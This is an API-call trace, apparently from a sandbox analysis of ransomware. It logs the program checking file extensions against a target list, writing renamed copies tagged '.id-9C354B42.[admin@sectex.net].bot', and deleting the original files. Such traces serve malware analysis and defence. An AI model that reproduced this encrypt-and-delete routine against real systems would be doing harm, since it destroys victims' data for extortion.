	[0054.788] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0054.788] SetEndOfFile (hFile=0x1a8) returned 1
	[0054.791] CloseHandle (hObject=0x1a8) returned 1
	[0054.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0054.791] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\gifimp32.flt")) returned 1
	[0054.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.791] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.791] lstrlenW (lpString=".doc") returned 4
	[0054.791] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0054.792] lstrlenW (lpString=".docx") returned 5
	[0054.792] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0054.792] lstrlenW (lpString=".pdf") returned 4
	[0054.792] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString=".xls") returned 4
	[0054.792] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString=".xlsx") returned 5
	[0054.792] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0054.792] lstrlenW (lpString=".ppt") returned 4
	[0054.792] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString=".zip") returned 4
	[0054.792] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString=".rar") returned 4
	[0054.792] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString=".bz2") returned 4
	[0054.792] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0054.792] lstrlenW (lpString=".7z") returned 3
	[0054.792] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString=".dbf") returned 4
	[0054.792] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString=".1cd") returned 4
	[0054.792] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString=".jpg") returned 4
	[0054.792] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.792] lstrlenW (lpString=".doc") returned 4
	[0054.792] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0054.792] lstrlenW (lpString=".docx") returned 5
	[0054.792] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0054.792] lstrlenW (lpString=".pdf") returned 4
	[0054.793] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0054.793] lstrlenW (lpString=".xls") returned 4
	[0054.793] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0054.793] lstrlenW (lpString=".xlsx") returned 5
	[0054.793] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0054.793] lstrlenW (lpString=".ppt") returned 4
	[0054.793] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0054.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.793] lstrlenW (lpString=".zip") returned 4
	[0054.793] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0054.793] lstrlenW (lpString=".rar") returned 4
	[0054.793] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0054.793] lstrlenW (lpString=".bz2") returned 4
	[0054.793] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0054.793] lstrlenW (lpString=".7z") returned 3
	[0054.793] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0054.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.793] lstrlenW (lpString=".dbf") returned 4
	[0054.793] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0054.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.793] lstrlenW (lpString=".1cd") returned 4
	[0054.793] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0054.793] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 67
	[0054.793] lstrlenW (lpString=".jpg") returned 4
	[0054.793] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0054.793] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0054.793] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0054.793] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.795] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=3584) returned 1
	[0054.795] CloseHandle (hObject=0x1a8) returned 1
	[0054.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui")) returned 0x20
	[0054.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.795] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0054.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.795] lstrlenW (lpString=".doc") returned 4
	[0054.795] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.795] lstrlenW (lpString=".docx") returned 5
	[0054.795] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.795] lstrlenW (lpString=".pdf") returned 4
	[0054.795] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.795] lstrlenW (lpString=".xls") returned 4
	[0054.795] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.795] lstrlenW (lpString=".xlsx") returned 5
	[0054.795] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.795] lstrlenW (lpString=".ppt") returned 4
	[0054.795] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".zip") returned 4
	[0054.796] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString=".rar") returned 4
	[0054.796] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString=".bz2") returned 4
	[0054.796] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.796] lstrlenW (lpString=".7z") returned 3
	[0054.796] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".dbf") returned 4
	[0054.796] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".1cd") returned 4
	[0054.796] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".jpg") returned 4
	[0054.796] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".doc") returned 4
	[0054.796] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.796] lstrlenW (lpString=".docx") returned 5
	[0054.796] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.796] lstrlenW (lpString=".pdf") returned 4
	[0054.796] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString=".xls") returned 4
	[0054.796] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString=".xlsx") returned 5
	[0054.796] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.796] lstrlenW (lpString=".ppt") returned 4
	[0054.796] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.796] lstrlenW (lpString=".zip") returned 4
	[0054.796] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.797] lstrlenW (lpString=".rar") returned 4
	[0054.797] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.797] lstrlenW (lpString=".bz2") returned 4
	[0054.797] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.797] lstrlenW (lpString=".7z") returned 3
	[0054.797] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.797] lstrlenW (lpString=".dbf") returned 4
	[0054.797] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.797] lstrlenW (lpString=".1cd") returned 4
	[0054.797] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72
	[0054.797] lstrlenW (lpString=".jpg") returned 4
	[0054.797] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.797] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0054.797] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0054.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.798] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=4096) returned 1
	[0054.798] CloseHandle (hObject=0x1a8) returned 1
	[0054.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20
	[0054.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0054.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.798] lstrlenW (lpString=".doc") returned 4
	[0054.798] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.798] lstrlenW (lpString=".docx") returned 5
	[0054.798] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.798] lstrlenW (lpString=".pdf") returned 4
	[0054.798] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.798] lstrlenW (lpString=".xls") returned 4
	[0054.798] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.798] lstrlenW (lpString=".xlsx") returned 5
	[0054.798] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.798] lstrlenW (lpString=".ppt") returned 4
	[0054.798] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.798] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.798] lstrlenW (lpString=".zip") returned 4
	[0054.798] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.798] lstrlenW (lpString=".rar") returned 4
	[0054.798] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.798] lstrlenW (lpString=".bz2") returned 4
	[0054.798] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.798] lstrlenW (lpString=".7z") returned 3
	[0054.799] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".dbf") returned 4
	[0054.799] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".1cd") returned 4
	[0054.799] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".jpg") returned 4
	[0054.799] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".doc") returned 4
	[0054.799] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.799] lstrlenW (lpString=".docx") returned 5
	[0054.799] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.799] lstrlenW (lpString=".pdf") returned 4
	[0054.799] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.799] lstrlenW (lpString=".xls") returned 4
	[0054.799] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.799] lstrlenW (lpString=".xlsx") returned 5
	[0054.799] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.799] lstrlenW (lpString=".ppt") returned 4
	[0054.799] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".zip") returned 4
	[0054.799] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.799] lstrlenW (lpString=".rar") returned 4
	[0054.799] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0054.799] lstrlenW (lpString=".bz2") returned 4
	[0054.799] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0054.799] lstrlenW (lpString=".7z") returned 3
	[0054.799] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0054.799] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.799] lstrlenW (lpString=".dbf") returned 4
	[0054.800] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0054.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.800] lstrlenW (lpString=".1cd") returned 4
	[0054.800] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0054.800] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72
	[0054.800] lstrlenW (lpString=".jpg") returned 4
	[0054.800] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0054.800] lstrcmpiW (lpString1=".exe", lpString2=".bot") returned 1
	[0054.800] lstrlenW (lpString="ConvertInkStore.exe") returned 19
	[0054.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.800] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=193024) returned 1
	[0054.800] CloseHandle (hObject=0x1a8) returned 1
	[0054.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20
	[0054.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.800] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString=".doc") returned 4
	[0054.801] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0054.801] lstrlenW (lpString=".docx") returned 5
	[0054.801] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0054.801] lstrlenW (lpString=".pdf") returned 4
	[0054.801] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0054.801] lstrlenW (lpString=".xls") returned 4
	[0054.801] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0054.801] lstrlenW (lpString=".xlsx") returned 5
	[0054.801] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0054.801] lstrlenW (lpString=".ppt") returned 4
	[0054.801] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString=".zip") returned 4
	[0054.801] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0054.801] lstrlenW (lpString=".rar") returned 4
	[0054.801] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0054.801] lstrlenW (lpString=".bz2") returned 4
	[0054.801] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0054.801] lstrlenW (lpString=".7z") returned 3
	[0054.801] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString=".dbf") returned 4
	[0054.801] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString=".1cd") returned 4
	[0054.801] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0054.801] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.801] lstrlenW (lpString=".jpg") returned 4
	[0054.801] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString=".doc") returned 4
	[0054.802] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1
	[0054.802] lstrlenW (lpString=".docx") returned 5
	[0054.802] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1
	[0054.802] lstrlenW (lpString=".pdf") returned 4
	[0054.802] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString=".xls") returned 4
	[0054.802] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString=".xlsx") returned 5
	[0054.802] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1
	[0054.802] lstrlenW (lpString=".ppt") returned 4
	[0054.802] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString=".zip") returned 4
	[0054.802] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString=".rar") returned 4
	[0054.802] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1
	[0054.802] lstrlenW (lpString=".bz2") returned 4
	[0054.802] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1
	[0054.802] lstrlenW (lpString=".7z") returned 3
	[0054.802] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString=".dbf") returned 4
	[0054.802] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString=".1cd") returned 4
	[0054.802] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1
	[0054.802] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70
	[0054.802] lstrlenW (lpString=".jpg") returned 4
	[0054.802] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1
	[0054.802] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0054.803] lstrlenW (lpString="tipresx.dll.mui") returned 15
	[0054.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0054.803] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=3584) returned 1
	[0054.803] CloseHandle (hObject=0x1a8) returned 1
	[0054.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20
	[0054.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0054.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0054.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.803] lstrlenW (lpString=".doc") returned 4
	[0054.803] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0054.803] lstrlenW (lpString=".docx") returned 5
	[0054.803] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1
	[0054.803] lstrlenW (lpString=".pdf") returned 4
	[0054.803] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0054.803] lstrlenW (lpString=".xls") returned 4
	[0054.803] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString=".xlsx") returned 5
	[0054.804] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1
	[0054.804] lstrlenW (lpString=".ppt") returned 4
	[0054.804] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72
	[0054.804] lstrlenW (lpString=".zip") returned 4
	[0054.804] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0054.804] lstrlenW (lpString=".rar") returned 4
